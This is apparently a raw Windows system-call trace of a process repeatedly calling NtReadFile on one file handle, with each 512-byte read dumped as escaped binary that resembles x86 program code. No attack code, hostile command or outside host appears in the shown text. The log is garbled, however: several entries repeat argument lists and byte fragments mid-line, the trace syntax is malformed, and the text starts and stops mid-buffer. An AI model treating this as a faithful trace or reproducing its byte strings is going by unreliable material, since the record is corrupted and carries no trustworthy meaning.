\203}\314\0\17\204\317\2\0\0\213M\310\377M\314\17\266\21\213\313\323\342\11U\300\377E\310\203\303\10;\330r\334\17\267\4E\0\220@\0#E\300\213N\10\215\4\201\17\266H\1\323m\300+\331\17\266\10\366\301\20t\30\203\341\17\211N\10\17\267@\2\211F\14\307\6\4\0\0\0\351k\2\0\0\366\301@\17\205\5\371\377\377\211N\14\17\267H\2\215\4\210\211F\10\351P\2\0\0\213F\10\353 \203}\314\0\17\204Q\2\0\0\213M\310\377M\314\17\266\21\213\313\323\342\11U\300\377E\310\203\303\10;\330r\334\17\267\14E\0\220@", ) , ) == 0x0
 00731   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "+\330\307\6\5\0\0\0\213E\320\213V\14\213\310+\316\201\351\240\33\0\0;\312s\23\213\216\240\233\0\0+\312+\316\215\214\1`\344\377\377\353\4\213\310+\312\203~\4\0\211M\340\17\204\220\371\377\377\213}\324\205\377\17\205\221\0\0\0\213\276\240\233\0\0;\307u#\213\216\244\233\0\0\215\226\240\33\0\0;\312t\23\213\302;\301s\7+\310I\213\371\353\2+\370\205\377ud\377u\10\211\206\250\233\0\0\350\11\2\0\0\213\206\250\233\0\0\213\216\244\233\0\0;\301\211E\320s\7\213\371+\370O\353\10\213\276\240\233\0\0+\370\213\226\240\233\0\0;\302\211U\370u\37\215\226\240\33\0\0;\312t\25\213\302;\301\211E\320s\7+\310I\213\371\353\5\213}\370+\370\205\377\17\204d\1\0\0\213M\340\212\21\210\20@AO;\216\240\233\0\0\211E\320\211M\340\211}\324u\11\215\216\240\33\0\0\211M\340\377N\4\17\205:\377\377\377\351\302\370\377\377\213E\324\213}\320\205\300\17\205\221\0\0\0\213\216\240\233\0\0;\371u#\213\206\244\233\0\0\215\226\240\33\0\0;\302t\23\213\372;\370s\5+\307H\353\4+\317\213\301\205\300ud\377u\10\211\276\250\233\0\0\3508\1\0\0\213\276\250\233\0\0\213\216\244\233\0\0;\371\211}\320s\7\213\301+\307H\353\10\213\206\240\233\0\0+\307\213\226\240\233\0\0;\372\211U\370u\37\215\226\240\33\0\0;\312t\25\213\372;\371\211}\320s\7+\317I\213\301\353\5\213E\370+\307\205\300\17\204\223\0\0\0\212N\10\210\17GH\211}\320\211E\324\351\21\370\377\377\203\373\7v\11\203\353\10\377E\314\377M\310\213E\320\377u\10\211\206\250\233\0\0\350\261\0\0\0\213\216\250\233\0\0\213\226\244\233\0\0;\312\211M\320s\7\213\302+", ) , ) == 0x0
 00732   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, ";\312\211E\324u9\213\206\24\5\0\0\203\370\10\211\6u3\213\6\203\370\17\17\2062\366\377\377\351\223\366\377\377\213E\3003\377\211\206\34\5\0\0\213E\10\211\236\30\5\0\0\211x\4\351\230\366\377\3773\377\351y\366\377\3773\377G\351q\366\377\377L\26@\0_\26@\0\365\26@\0F\27@\0\304\27@\0\10\30@\0\16\31@\0\277\31@\0x\20@\0\15\22@\02\22@\0@\23@\0\177\23@\0b\25@\0\267\20@\0\315\31@\0SV\213t$\14W\213\276\264\233\0\0\213\236\270\233\0\0;\373v\6\213\236\260\233\0\0\213F\14+\337;\330r\2\213\330SW\377v\10+\303\211F\14\350\251J\0\0\1^\10\213\206\260\233\0\0\3\373;\370u\269\206\270\233\0\0\215\276\260\33\0\0u\271\211\276\270\233\0\0\353\261\211\276\264\233\0\0_^[\302\4\0U\213\354\201\354\354\0\0\0SV\213u\14Wj\203\300Y\215}\220\363\253\213M\10\213\326\213\1\203\301\4\215D\205\220\377\0Ju\3629u\220u\23\213E\34\203 \0\213E \203 \03\300\351\360\2\0\0\213u 3\333Cj\17\213>\213\313\211} Z3\3009D\215\220u\5A;\312v\363;\371\211M\374s\3\211M 9D\225\220u\3Ju\3679U \211U\350v\3\211U \213} \211>\323\343\353\15+\\215\220\17\210\237\2\0\0A\3\333;\312r\357\213\362\301\346\2\215L5\220\2139+\337\211]\320\17\210\202\2\0\0\3\373\211\205T\377\377\377\21193\311Jt\233\377\3L=\224\203\307\4J\211\214=T\377\377\377u\357\213]\103\377\213\13\203\303\4;\310t\23\215\214\215P\377\377\377\213\21\211<\225\200\230@\0B\211\21G;}\14r\336\213\2145P\377", ) , ) == 0x0
 00733   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\0\211M\14\213M\374\367\333;M\350\211E\370\211\205P\377\377\377\307E\340\200\230@\0\211\205\24\377\377\377\17\217\363\1\0\0\215Q\377\215L\215\220\211U\330\211M\344\213M\344\2131\205\366\17\204\303\1\0\0\353\3\213u\324\213M N\3\313\211u\3249M\374\211M\354\17\216\314\0\0\0F\211u\360\213u\350\377E\364+u\354;u v\3\213u \213M\3743\322+M\354B\323\342;U\360v#\213}\344\203\310\377+E\324\3\320;\316s\24\353\15\203\307\4\3\322\213\7;\320v\7+\320A;\316r\356\213U(3\300@\213\22\323\340\211E\334\215<\2\201\377\240\5\0\0\17\207h\1\0\0\213E$\215\4\220\213U\364\215\264\225\24\377\377\377\213U(\211:\213U\364\205\322\211\6t1\213}\370\213v\374\211\274\225P\377\377\377\212U \210U\11\210M\10\213\327\213\313\323\352\213\310+\316\301\371\2+\312f\211M\12\213M\10\211\14\226\353\5\213M\34\211\1\213M\354\213\331\3M 9M\374\211M\354\17\2178\377\377\377\212M\374\213u\340*\313\210M\11\213M\14\215\14\215\200\230@\0;\361r\6\306E\10\300\353C\213\16;M\20s\34\201\371\0\1\0\0\17\222\301\376\311\203\341`\210M\10f\213\16\203\306\4\211u\340\353\34+M\20\213U\30\3\311\212\24\21\200\302P\203E\340\4\210U\10\213U\24f\213\14\21f\211M\12\213M\374\213U\3703\377+\313G\213\367\323\346\213\313\323\352\353\10\213M\10\211\14\220\3\326;U\334r\363\213M\330\213u\370\213\327\323\342\353\43\362\321\352\205\326u\370\213\3173\362\211M\360\213\313\213\327\211u\370\323\342J#\326\213\312\213U\364;\214\225P\377\377\377t\32+] \213\367J\213\313\323\346N#u\370;\264\225P\377", ) , ) == 0x0
 00734   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\205?\376\377\377\377E\374\203E\344\4\213M\374\377E\330;M\350\17\216\32\376\377\3773\3009E\320t\11\203}\350\1t\3\203\310\377_^[\311\302$\0U\213\354\203\354\\203}\14\17t+\203}\14F\213E\24u\15\203H\30\20\213\15$\360B\0\211H\4P\377u\20\377u\14\377u\10\377\25Lr@\0\351B\1\0\0SV\2135(\360B\0\215E\244WP\377u\10\377\25Pr@\0\203e\364\0\211E\14\215E\344P\377u\10\377\25Tr@\0\213}\360\203e\360\0\213\35@p@\0\351\200\0\0\0\17\266FR\17\266VV\17\257U\350\213\317+M\350\17\257\301\3\302\211M\20\231\367\3773\322\212\360\17\266FQ\17\257\301\17\266NU\17\257M\350\3\301\213\312\231\367\377\17\266VT\17\257U\350\212\310\17\266FP\17\257E\20\3\302\231\367\377\301\341\10\17\266\300\13\310\215E\364P\211M\370\377\25Dp@\0\203E\360\4\211E\24P\215E\344P\377u\14\377\25Xr@\0\377u\24\377\323\203E\350\49}\350\17\214w\377\377\377\203~X\377te\377v4\377\25Hp@\0\205\300\211E\24tU\213}\14j\1W\307E\344\20\0\0\0\307E\350\10\0\0\0\377\25Lp@\0\377vXW\377\25Pp@\0\377u\24\2135Xp@\0W\377\326\211E\14\215E\344h \10\0\0Pj\377h \350B\0W\377\25\r@\0\377u\14W\377\326\377u\24\377\323\215E\244P\377u\10\377\25`r@\0_^3\300[\311\302\20\0\203=\214\245@\0\0Vu-3\311j\10\213\301^\213\320\200\342\1\366\332\33\322\201\342 \203\270\355\321\3503\302Nu\352\211\4\215\210\245@\0A\201\371\0\1\0\0|\325\213T$\20\213D$\10\205\322\367\320v#", ) , ) == 0x0
 00735   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\377\0\0\03\367\301\350\10\2134\265\210\245@\03\306AJu\343_\367\320^\302\14\0V\213t$\10\351\204\0\0\0\213\306\213\15P\360B\0k\300\34\3\301\2038\1tzP\350\252\0\0\0=\377\377\377\177ts\205\300}\23@\271\0\0C\0\301\340\12+\310Q\350\345G\0\0\205\300u\63\300@F\353\7H\213\316\213\360+\301\203|$\14\0t8\1\5\14\350B\0\241\364\347B\03\311j\0\205\300\17\224\301\3\310Qh0u\0\0\3775\14\350B\0\377\25\14q@\0Ph\2\4\0\0\377t$\30\377\25Hr@\0\205\366\17\215t\377\377\3773\300^\302\10\0\270\377\377\377\177\353\365\213D$\4\213\15(\360B\0j\0\377t\201l\350H\377\377\377\302\4\0h\310\255@\0\377t$\10\350\306;\0\0\302\4\0U\213\354\201\354\244\1\0\0\241\200\360B\0SV\213u\10Wj\7\211E\314\241$\360B\0Y\215}\330\211E\3703\333\363\245\213E\334\213U\340\213\360\213\372\301\346\12\271\0\0C\0\211]\374\301\347\12\3\361\3\371\215M\334\211\15\304\251@\0\213M\330\203\301\376\203\371A\17\207\242\24\0\0\377$\215\3725@\0SP\350X;\0\0\351\17\16\0\0\377\5\354\347B\09]\370\17\204\0\16\0\0S\377\25\20r@\0\351\364\15\0\0;\303}\21@\271\0\0C\0\301\340\12+\310Q\350\267F\0\0HSP\350\214\376\377\377\351]\24\0\0;\323t)\366\302\10t\17\2414\220@\0\243\300\222@\0\351:\24\0\0\241\300\222@\0\211\25\300\222@\0\2434\220@\0\351%\24\0\0SP\350\342:\0\0\351\31\24\0\0S\350a\25\0\0\203\370\1\177\33\300@P\377\25\234p@\0\351\377\23\0\0\377u\370\377\25\24r@\0\351\361", ) , ) == 0x0
 00736   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\334\211\4\215\240\360B\0\351\333\23\0\0\213E\344\2154\205\240\360B\03\300\213\16;\313\17\224\300#M\350\213D\205\334\211\16\351\305\23\0\0\3774\225\240\360B\0V\351\331\22\0\0\213\15\360\347B\0\2135\30r@\0;\313t\7RQ\377\326\213E\334\213\15\4\350B\0;\313\17\204\210\23\0\0PQ\377\326\351\177\23\0\0j\360\350\343\24\0\0\377u\340P\377\25\230p@\0\205\300\17\205f\23\0\0\351\33\21\0\0j\360\350\305\24\0\0\213\370W\350\315A\0\08\37\213\360t=;\363t9j\V\350SA\0\0\213\360W\212\6\210\36\210E\13\350\364H\0\0;\303u\14SW\377\25\224p@\0\205\300\353\3\366\0\20u\3\377E\374\212E\13\210\6F:\303u\3079]\340t\36j\346\350\363\375\377\377Wh\0XC\0\350\331E\0\0W\377\25\220p@\0\351\354\22\0\0j\365\351\271\13\0\0S\350J\24\0\0P\350\234H\0\0\351\210\6\0\0j\320\3508\24\0\0j\337\211E\10\350.\24\0\0\377u\10\276\310\255@\0\211E\370V\350\223E\0\0\377u\370\350\221E\0\0\377u\10\213\370\350\207E\0\0\3\370\201\377\375\3\0\0}\24\213=\214p@\0hD\220@\0V\377\327\377u\370V\377\327\377u\370\377u\10\377\25\210p@\0\205\300t\7j\343\351?\13\0\09]\344\17\204\34\20\0\0\377u\10\350\35H\0\0\205\300\17\204\14\20\0\0\377u\370\377u\10\350eB\0\0j\344\351\24\13\0\0S\350\245\23\0\0\215M\314\276\0\4\0\0QWVP\211E\10\377\25\204p@\0\205\300t&\213E\314;E\10v'8\30t#\377u\10\350\320G\0\0;\303t\16\203\300,P\377u\314\350\336D\0\0\353\11\307E\374\1\0\0\0", ) , ) == 0x0
 00737   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "WW\377\25\200p@\0\351\333\21\0\0j\377\350?\23\0\0\215M\10QVh\0\4\0\0SPS\377\25|p@\0\205\300\17\205\271\21\0\0\307E\374\1\0\0\0\210\36\351\253\21\0\0j\357\350\17\23\0\0PV\350sA\0\0\351*\376\377\377j1\350\374\22\0\0\213\360\213E\334\203\340\7V\211u\314\211E\10\350\321?\0\0V\276\310\251@\0\205\300t\10V\350ND\0\0\353\30h\0XC\0V\350AD\0\0P\350A?\0\0P\377\25\214p@\0V\350nF\0\0\277\310\261@\0\203}\10\3|1V\350\377F\0\03\311;\303t\20\215M\350\203\300\24QP\377\25xp@\0\213\310\213E\10\203\300\375\15\0\0\0\200#\301\367\330\33\300@\211E\109]\10u\21V\377\25tp@\0$\376PV\377\25\230p@\03\300\203}\10\1\17\225\300@Ph\0\0\0@V\350\214@\0\0\203\370\377\211E\370\17\205\202\0\0\09]\10uSh\0\0C\0W\350\252C\0\0Vh\0\0C\0\350\237C\0\0\377u\360h\310\255@\0\350\236C\0\0Wh\0\0C\0\350\207C\0\0\213E\334\301\370\3Ph\310\255@\0\350\257<\0\0\203\350\4\17\204D\377\377\377Ht'Vj\372\351\350\373\377\377\377u\314j\342\350;7\0\0\203}\10\2\17\205m\20\0\0\377\5\250\360B\0\351b\20\0\0\377\5\250\360B\0\351`\20\0\0\377u\314j\352\350\217\0\0\377\5\300\222@\0SS\377u\370\377u\344\350\305\25\0\0\377\15\300\222@\0\203}\350\377\213\370u\6\203}\354\377t\22\215E\350P\215E\350SP\377u\370\377\25pp@\0\377u\370\377\25lp@\0;\373\17\215\3\20\0\0\203\377\376u\24j\351V\350\343B\0\0\377u", ) , ) == 0x0
 00738   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "V\350\317B\0\0h\20\0\20\0V\351R\11\0\0S\3534j1\3508\21\0\0\377u\334P\350\336;\0\0;\303\17\204v\15\0\0;E\344\17\2044\1\0\0;E\354\17\205\252\17\0\0\213E\360\351\255\17\0\0j\360\350\6\21\0\0\377u\340P\350\375;\0\0\351\215\17\0\0j\1\350\361\20\0\0P\350gB\0\0\351\203\13\0\0j\2\350\302\20\0\0j\3\211E\10\350\270\20\0\0j\1\213\370\350\314\20\0\09]\344\211E\320\210\36t\119]\10\17\204N\17\0\0P\350/B\0\0;\373}\10\3\370\17\210<\17\0\0;\370~\2\213\370\213E\320\3\307PV\350\13B\0\0\213}\10;\373\17\204\37\17\0\0}\17V\350\376A\0\0\3\370y\5\211]\10\213\373\201\377\0\4\0\0\17\215\2\17\0\0\210\347\351\372\16\0\0j \350^\20\0\0j1\213\360\350U\20\0\0PV\377\25hp@\0\205\300u_\213E\344\351\341\16\0\03\377GW\3508\20\0\09]\344h\0\4\0\0VPt\21\377\25dp@\0\205\300u\15\211}\374\210\36\353\6\377\25`p@\0\210\236\377\3\0\0\351\237\16\0\0S\350\347\17\0\0j\1\213\360\350\336\17\0\09]\360u\10;\360|\10~\247\353\16;\360s\10\213E\350\351\202\16\0\0v\227\213E\354\351x\16\0\0j\1\350\264\17\0\0j\2\213\370\350\253\17\0\0\213\310\213E\350\203\370\14wm\377$\205\27@\0\3\371\353b+\371\353^\17\257\317\213\371\353W;\313tB\213\307\231\367\371\213\370\353J\13\371\353F#\371\353B3\371\353>3\300;\373\17\224\300\353\347;\373u\16\353\103\377\353+;\373t\370;\313t\3643\377G\353\36;\313t\11\213\307\231\367\371\213\372\353\213\377\307", ) , ) == 0x0
 00739   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\323\377W\351-\372\377\377j\1\350D\17\0\0j\2\213\370\350\36\17\0\0PWV\377\25\34r@\0\203\304\14\351\277\15\0\0\213E\344\213=\310\305@\0;\303tDH;\373\17\204\26\7\0\0\213?;\303u\361;\373\17\204\10\7\0\0\203\307\4\276\310\251@\0WV\350m@\0\0\241\310\305@\0\203\300\4PW\350^@\0\0\241\310\305@\0V\203\300\4P\351\0\13\0\0;\323t%;\373\17\204\34\13\0\0\215G\4PV\3509@\0\0\213\7W\243\310\305@\0\377\25\274p@\0\351E\15\0\0h\4\4\0\0\350\2279\0\0\377u\334\213\360\215F\4P\350\32@\0\0\241\310\305@\0\211\6\2115\310\305@\0\351\33\15\0\0j3\350\177\16\0\0jD\211E\370\350u\16\0\0\366E\360\1\211E\10u\13\377u\370\350Q?\0\0\211E\370\366E\360\2u\13\377u\10\350@?\0\0\211E\10\203}\330!j\1uD\350&\16\0\0j\2\213\370\350\35\16\0\0\213M\360\301\371\2t\36\215U\314RQS\377u\10\377u\370PW\377\25 r@\0\367\330\33\300@\211E\374\353?\377u\10\377u\370PW\377\25Hr@\0\353,\350\377\15\0\0j\22\213\370\350\366\15\0\0\212\10\366\331\33\311#\310\212\7\366\330\33\300Q#\307P\377u\10\377u\370\377\25$r@\0\211E\3149]\334\17\214a\14\0\0\377u\314\351\246\370\377\377S\350\241\15\0\0P\377\25(r@\0\205\300\17\204f\375\377\377\213E\340\351G\14\0\0j\2\350\203\15\0\0Pj\1\350{\15\0\0P\377\25,r@\0\351)\10\0\0\241h\360B\0\3\302Pj\353S\350_\15\0\0P\377\250r@\0\351\5\14\0\0R\377u\370\377\25,r@\0\213\360\215E\300PV", ) , ) == 0x0
 00740   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\257E\344P\213E\310\17\257E\344PSS\350@\15\0\0PS\377\254r@\0PShr\1\0\0V\377\25Hr@\0;\303\17\204\267\13\0\0P\377\25@p@\0\351\253\13\0\0jHjZ\377u\370\377\258r@\0P\377\25\0\0h\210\251@\0\377\25Hp@\0\3519\7\0\0S\350y\14\0\0j\1\213\360\350p\14\0\09]\350PVu\13\377\25\30r@\0\351\20\13\0\0\377\25\213\330\350X\14\0\0SVh<\220@\0h\310\255@\0\213\370\377\25\34r@\0\203\304\20j\354\350\277\365\377\377\212\7\377u\350\366\330\33\300h\0XC\0#\307P\212\6\366\330\33\300S#\306P\377u\370\377\25\q@\0\203\370!\17\215\242\12\0\0\351W\10\0\0S\350\2\14\0\0\213\360Vj\353\350Q1\0\0h\0XC\0V\350$6\0\0;\303\211E\10\17\2041\10\0\09]\344tnjdP\377\25$q@\0=\2\1\0\0u5\2135dr@\0\353\12\215E\234P\377\25@r@\0j\1j\17j\17\215E\234SP\377\326\205\300u\345jd\377u\10\377\25$q@\0=\2\1\0\0t\335\215E\314P\377u\10\377\25(q@\09]\340|\13\377u\314W\350Q<\0\0\353\149]\314t\7\307E\374\1\0\0\0\377u\10\377\25lp@\0\351\366\11\0\0j\2", ) \213\330\350X\14\0\0SVh<\220@\0h\310\255@\0\213\370\377\25\34r@\0\203\304\20j\354\350\277\365\377\377\212\7\377u\350\366\330\33\300h\0XC\0#\307P\212\6\366\330\33\300S#\306P\377u\370\377\25\q@\0\203\370!\17\215\242\12\0\0\351W\10\0\0S\350\2\14\0\0\213\360Vj\353\350Q1\0\0h\0XC\0V\350$6\0\0;\303\211E\10\17\2041\10\0\09]\344tnjdP\377\25$q@\0=\2\1\0\0u5\2135dr@\0\353\12\215E\234P\377\25@r@\0j\1j\17j\17\215E\234SP\377\326\205\300u\345jd\377u\10\377\25$q@\0=\2\1\0\0t\335\215E\314P\377u\10\377\25(q@\09]\340|\13\377u\314W\350Q<\0\0\353\149]\314t\7\307E\374\1\0\0\0\377u\10\377\25lp@\0\351\366\11\0\0j\2", ) == 0x0
 00741   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\303\211E\10t\23\213\330\377s\24W\350\26<\0\0\377s\30\351\34\366\377\377\210\36\210\37\351\200\7\0\0\215E\250j\356\211E\10\350$\13\0\0\215M\324\211E\320QP\350\272?\0\0\210\36;\303\211E\370\210\37\307E\374\1\0\0\0\17\204\226\11\0\0P\350\3545\0\0;\303\211E\314\17\204\205\11\0\0P\377u\370S\377u\320\350\200?\0\0\205\300t4\215E\274P\215E\10Ph8\220@\0\377u\314\350a?\0\0\205\300t\33\213E\10\377p\10V\350\216;\0\0\213E\10\377p\14W\350\202;\0\0\211]\374\377u\314\351\350\373\377\3773\377h\1\200\0\0G\211}\374\377\25,q@\09\35\320\360B\0\17\214\232\0\0\0j\360\350\177\12\0\0W\213\360\350w\12\0\09]\354\211E\10t\15V\377\254q@\0\213\370;\373u\15V\377\258q@\0\213\370;\373te\377u\10W\377\25, ) , ) == 0x0
 00742   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\213\370\213E\10h\0XC\0P\213\10\377Q$\213M\354\276\377\0\0\0\213\301\301\370\10#\306t\15\213M\10PQ\213\21\377R<\213M\354\213E\10\301\371\20\213\20QP\377R4\213E\3148\30t\22\213U\354\213E\10#\326\213\10R\377u\314P\377QD\213E\10\377u\320\213\10P\377Q,\213E\10\377u\274\213\10P\377Q\34;\373|-\276\310\275@\0h\0\4\0\0Vj\377\377u\324f\211\35\310\275@\0SS\377\25Dq@\0\213E\370j\1VP\213\10\377Q\30\213\370\213E\370P\213\10\377Q\10\213E\10P\213\10\377Q\10;\373}\23\307E\374\1\0\0\0j\360\350\27\362\377\377\351"\7\0\0j\364\353\362S\350\203\10\0\0\213\370j\21\211}\10\350w\10\0\0\213\360\213E\370W\211E\234\307E\240\2\0\0\0\350\3369\0\0V\210\8\1\350\3249\0\0\277\310\261@\0j\370W\210\0\1\350\3119\0\0VW\377\25\214p@\0\213E\10W\211E\244f\213E\344S\211u\250\211}\266f\211E\254\350}-\0\0\215E\234P\377\25pq@\0\205\300\17\204\247\6\0\0Sj\371\350c-\0\0\351T\4\0\0=\15\360\255\13t\35h\20\0\20\0j\350S\350s9\0\0P\350\2322\0\0\270\377\377\377\177\351\201\6\0\0\377\5\264\360B\0\351k\6\0\03\3663\377;\303t\13S\350\310\7\0\0\213U\340\213\360;\323t\11j\21\350\270\7\0\0\213\3709]\354t\11j"\350\252\7\0\0\213\330j\315\350\241\7\0\0PSWV\377\25Hq@\0\351\271\362\377\377j\1\307E\10!N~\0\350\204\7\0\0j\22\213\370\350{\7\0\0j\335\211E\324\350q\7\0\0Ph\377\3\0\0\215E\10VP\377u\324W\377\25L", ) \7\0\0j\364\353\362S\350\203\10\0\0\213\370j\21\211}\10\350w\10\0\0\213\360\213E\370W\211E\234\307E\240\2\0\0\0\350\3369\0\0V\210\8\1\350\3249\0\0\277\310\261@\0j\370W\210\0\1\350\3119\0\0VW\377\25\214p@\0\213E\10W\211E\244f\213E\344S\211u\250\211}\266f\211E\254\350}-\0\0\215E\234P\377\25pq@\0\205\300\17\204\247\6\0\0Sj\371\350c-\0\0\351T\4\0\0=\15\360\255\13t\35h\20\0\20\0j\350S\350s9\0\0P\350\2322\0\0\270\377\377\377\177\351\201\6\0\0\377\5\264\360B\0\351k\6\0\03\3663\377;\303t\13S\350\310\7\0\0\213U\340\213\360;\323t\11j\21\350\270\7\0\0\213\3709]\354t\11j (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\213\370\213E\10h\0XC\0P\213\10\377Q$\213M\354\276\377\0\0\0\213\301\301\370\10#\306t\15\213M\10PQ\213\21\377R<\213M\354\213E\10\301\371\20\213\20QP\377R4\213E\3148\30t\22\213U\354\213E\10#\326\213\10R\377u\314P\377QD\213E\10\377u\320\213\10P\377Q,\213E\10\377u\274\213\10P\377Q\34;\373|-\276\310\275@\0h\0\4\0\0Vj\377\377u\324f\211\35\310\275@\0SS\377\25Dq@\0\213E\370j\1VP\213\10\377Q\30\213\370\213E\370P\213\10\377Q\10\213E\10P\213\10\377Q\10;\373}\23\307E\374\1\0\0\0j\360\350\27\362\377\377\351"\7\0\0j\364\353\362S\350\203\10\0\0\213\370j\21\211}\10\350w\10\0\0\213\360\213E\370W\211E\234\307E\240\2\0\0\0\350\3369\0\0V\210\8\1\350\3249\0\0\277\310\261@\0j\370W\210\0\1\350\3119\0\0VW\377\25\214p@\0\213E\10W\211E\244f\213E\344S\211u\250\211}\266f\211E\254\350}-\0\0\215E\234P\377\25pq@\0\205\300\17\204\247\6\0\0Sj\371\350c-\0\0\351T\4\0\0=\15\360\255\13t\35h\20\0\20\0j\350S\350s9\0\0P\350\2322\0\0\270\377\377\377\177\351\201\6\0\0\377\5\264\360B\0\351k\6\0\03\3663\377;\303t\13S\350\310\7\0\0\213U\340\213\360;\323t\11j\21\350\270\7\0\0\213\3709]\354t\11j"\350\252\7\0\0\213\330j\315\350\241\7\0\0PSWV\377\25Hq@\0\351\271\362\377\377j\1\307E\10!N~\0\350\204\7\0\0j\22\213\370\350{\7\0\0j\335\211E\324\350q\7\0\0Ph\377\3\0\0\215E\10VP\377u\324W\377\25L", ) , ) == 0x0
 00743   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\3779]\354u+j\2\350\15\10\0\0\213\360;\363\17\204\213\3\0\0j3\3505\7\0\0PV\377\25\30p@\0V\213\370\377\25\34p@\0\353\31j"\350\33\7\0\0\213M\354\203\341\2QP\377u\340\350K\7\0\0\213\370;\373\17\204\226\5\0\0\351K\3\0\0\213u\354\213\370\213E\360j\2\211E\324\350\352\6\0\0j\21\211E\274\350\340\6\0\0\215M\10SQSj\2SSSPW\307E\374\1\0\0\0\377\25\14p@\0\205\300\17\205S\5\0\0\203\376\1\277\310\261@\0u\16j#\350\255\6\0\0W\350#8\0\0@\203\376\4u\16j\3\350}\6\0\0V\243\310\261@\0X\203\376\3u\17h\0\14\0\0WS\377u\350\350\237\12\0\0PW\377u\324S\377u\274\377u\10\377\25\10p@\0\205\300u\3\211]\374\377u\10\351\300\0\0\0h\31\0\2\0\350\33\7\0\0j3\213\370\350K\6\0\0;\373\210\36\17\204\220\2\0\0\215M\324\307E\324\0\4\0\0Q\215M\10VQSPW\377\25\4p@\03\311A\205\300u.\203}\10\4t\229M\10t\6\203}\10\2u\359]\354tl\353\309]\354u\7\307E\374\1\0\0\0\3776V\350\3116\0\0\353T\210\36\211M\374\353Mh\31\0\2\0\350\251\6\0\0j\3\213\370\350\274\5\0\0;\373\210\36\17\204\36\2\0\09]\354\271\377\3\0\0\211M\10t\14QVPW\377\25 p@\0\353\21SSS\215M\10SQVPW\377\25\0p@\0\210\236\377\3\0\0W\377\25\34p@\0\351(\4\0\08\36\17\204 \4\0\0V\350r6\0\0P\351\23\372\377\377j\355\350x\5\0\0\377u\344\377u\340P\350\2503\0\0\203\370\377\17\204\260\1\0\0P\351?\360", ) \350\33\7\0\0\213M\354\203\341\2QP\377u\340\350K\7\0\0\213\370;\373\17\204\226\5\0\0\351K\3\0\0\213u\354\213\370\213E\360j\2\211E\324\350\352\6\0\0j\21\211E\274\350\340\6\0\0\215M\10SQSj\2SSSPW\307E\374\1\0\0\0\377\25\14p@\0\205\300\17\205S\5\0\0\203\376\1\277\310\261@\0u\16j#\350\255\6\0\0W\350#8\0\0@\203\376\4u\16j\3\350}\6\0\0V\243\310\261@\0X\203\376\3u\17h\0\14\0\0WS\377u\350\350\237\12\0\0PW\377u\324S\377u\274\377u\10\377\25\10p@\0\205\300u\3\211]\374\377u\10\351\300\0\0\0h\31\0\2\0\350\33\7\0\0j3\213\370\350K\6\0\0;\373\210\36\17\204\220\2\0\0\215M\324\307E\324\0\4\0\0Q\215M\10VQSPW\377\25\4p@\03\311A\205\300u.\203}\10\4t\229M\10t\6\203}\10\2u\359]\354tl\353\309]\354u\7\307E\374\1\0\0\0\3776V\350\3116\0\0\353T\210\36\211M\374\353Mh\31\0\2\0\350\251\6\0\0j\3\213\370\350\274\5\0\0;\373\210\36\17\204\36\2\0\09]\354\271\377\3\0\0\211M\10t\14QVPW\377\25 p@\0\353\21SSS\215M\10SQVPW\377\25\0p@\0\210\236\377\3\0\0W\377\25\34p@\0\351(\4\0\08\36\17\204 \4\0\0V\350r6\0\0P\351\23\372\377\377j\355\350x\5\0\0\377u\344\377u\340P\350\2503\0\0\203\370\377\17\204\260\1\0\0P\351?\360", ) == 0x0
 00744   456   NtReadFile  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512},  (76, 0, 0, 0, 512, 0x0, 0, ... {status=0x0, info=512}, "\0\0\242\310\255@\03\300@\353\15j\21\350@\5\0\0P\350\2666\0\08\36\17\204\201\1\0\0\215M\10SQPh\310\255@\0V\350\166\0\0P\377\25Pq@\0\351<\360\377\377j\2\211]\320\350\356\4\0\0\203\370\1\211E\370\17\214\224\3\0\0\271\377\3\0\0;\301~\3\211M\3708\36\17\204\216\0\0\0V\210]\13\350\3175\0\09]\370\211E\314~}\213u\320\215E\324SP\215E\367j\1P\377u\314\377\250q@\0\205\300te\203}\324\1u_9]\350u!\200}\13\15t+\200}\13\12t%\212E\367\210\4>F:\303\210E\13t@;u\370|\276\3539\17\266E\367PW\350\5\0\0\351!\3\0\0\212E\3678E\13t\16<\15t\4<\12u\6\210\4>F\353\23j\1Sj\377\377u\314\377\25 q@\0\353\3\213u\320\210\34>;\363\351y\357\377\3778\36\17\204\335\2\0\0\377u\350Sj\2\350 \4\0\0PV\350#5\0\0P\377\25 